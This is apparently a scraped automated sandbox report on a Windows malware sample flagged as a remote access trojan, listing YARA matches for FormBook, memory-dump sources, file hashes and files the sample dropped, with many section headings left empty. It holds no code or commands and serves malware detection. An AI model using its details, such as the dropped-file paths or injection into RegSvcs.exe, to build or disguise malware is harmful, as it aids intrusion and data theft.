Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1482965
Product:	CloudBasic
Start time:	12:44:01
Start date:	26.07.2024
Sample:	SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	01fbcc6559c010e59be1dc7b66c12e4f
SHA1:	657f058d4032447658f71265803f7a6d52a64532
SHA256:	ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KfYvtUBOq.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	C961E3496AA47D8AF3F9E184D4F78133	0EFEA67BD361E99BBE642D6EF414EBE7BB6EC134	303E0E36CAC4900807E47B6AF8CDAB4FBFDB6A67D66F84F49E283557EA1774B1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2m55bhzl.3io.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hsaurdy.f4g.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfqqjebp.dkc.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmwoz1io.f1e.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\tmp89CA.tmp	XML 1.0 document, ASCII text	19B52953B4AA8ADD30C14346081CCB63	ECB68B30551AF606C8BF014A0495EE800E4AE540	973C9C63852F70930AA05E4400F461995A2FED85FB02D2183F428EF2D54E812C
C:\Users\user\AppData\Local\Temp\tmp9563.tmp	XML 1.0 document, ASCII text	19B52953B4AA8ADD30C14346081CCB63	ECB68B30551AF606C8BF014A0495EE800E4AE540	973C9C63852F70930AA05E4400F461995A2FED85FB02D2183F428EF2D54E812C
C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	01FBCC6559C010E59BE1DC7B66C12E4F	657F058D4032447658F71265803F7A6D52A64532	EE7DD9158F6175700AA6D58F346036F949889F8DEEBF8DBEE83C40874BBC1F26
C:\Users\user\AppData\Roaming\KfYvtUBOq.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309

Windows Analysis Report SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Malware Threat Intel
Provided by